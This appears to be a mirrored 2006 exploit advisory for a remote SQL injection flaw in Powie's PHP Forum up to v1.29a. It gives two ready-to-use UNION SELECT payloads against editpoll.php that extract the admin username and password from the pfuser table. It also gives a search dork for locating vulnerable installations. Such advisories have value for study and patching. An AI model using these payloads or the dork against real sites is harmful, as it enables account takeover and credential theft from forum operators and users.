Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:15143
HistoryNov 18, 2006 - 12:00 a.m.

Powie's PHP Forum <= v1.29a (editpoll) Remote SQL Injection Exploit

2006-11-1800:00:00
vulners.com
21

#==============================================================================================
#Powie's PHP Forum <= v1.29a (editpoll) Remote SQL Injection Exploit
#===============================================================================================

#Critical Level : Dangerous

#Venedor site : http://www.powie.de

#Version : v1.29a

#===============================================================================================

#DORK : "pForum 1.29a" // ""Powie's PSCRIPT Forum 1.26"

#Exploit :
#--------------------------------

#FOR USER : editpoll.php?id=-1 UNION SELECT null,null,username,null FROM pfuser where id=1
#FOR PASS : editpoll.php?id=-1 UNION SELECT null,null,pwd,null FROM pfuser where id=1

#================================================================================================
#Discoverd By : SHiKaA

#Conatact : SHiKaA-[at]hotmail.com

#Thx To : Str0ke & SuperRomio & XoRon & MDx & Simo

sPECial THanks to : CaMpA , Coder-AZH@CKTEAM

==================================================================================================